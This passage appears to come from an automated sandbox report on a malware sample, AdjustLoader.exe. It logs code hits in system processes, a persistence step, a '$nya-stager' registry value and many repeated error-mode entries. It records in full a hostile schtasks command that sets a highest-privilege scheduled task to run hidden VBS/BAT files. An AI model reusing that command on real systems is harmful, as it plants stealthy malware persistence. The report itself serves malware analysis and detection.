Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9B6BD2A5 pushad ; iretd 18_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
Source: C:\Windows\System32\cmd.exe Code function: 21_3_000001CC9146A5DD push rcx; retf 003Fh 21_3_000001CC9146A5DE
Source: C:\Windows\System32\conhost.exe Code function: 22_3_00000261C3DDA5DD push rcx; retf 003Fh 22_3_00000261C3DDA5DE
Source: C:\Windows\System32\conhost.exe Code function: 27_3_000002220AB7A5DD push rcx; retf 003Fh 27_3_000002220AB7A5DE
Source: C:\Windows\System32\conhost.exe Code function: 47_3_0000024D9FF5A5DD push rcx; retf 003Fh 47_3_0000024D9FF5A5DE
Source: C:\Windows\System32\conhost.exe Code function: 54_3_00000123B853A5DD push rcx; retf 003Fh 54_3_00000123B853A5DE
Source: C:\Windows\System32\dllhost.exe Code function: 55_3_0000021A201AA5DD push rcx; retf 003Fh 55_3_0000021A201AA5DE
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC65A5DD push rcx; retf 003Fh 56_3_00000225DC65A5DE
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC62A5DD push rcx; retf 003Fh 56_3_00000225DC62A5DE
Source: C:\Windows\System32\lsass.exe Code function: 57_3_00000202C0AFA5DD push rcx; retf 003Fh 57_3_00000202C0AFA5DE
Source: C:\Windows\System32\svchost.exe Code function: 58_3_000002A66131A5DD push rcx; retf 003Fh 58_3_000002A66131A5DE
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF24A5DD push rcx; retf 003Fh 59_3_000002BAAF24A5DE
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF1BA5DD push rcx; retf 003Fh 59_3_000002BAAF1BA5DE
Source: C:\Windows\System32\svchost.exe Code function: 60_3_0000026A879AA5DD push rcx; retf 003Fh 60_3_0000026A879AA5DE
Source: C:\Windows\System32\svchost.exe Code function: 61_3_000001795378A5DD push rcx; retf 003Fh 61_3_000001795378A5DE
Source: C:\Windows\System32\svchost.exe Code function: 62_3_000002295D54A5DD push rcx; retf 003Fh 62_3_000002295D54A5DE

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-stager
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
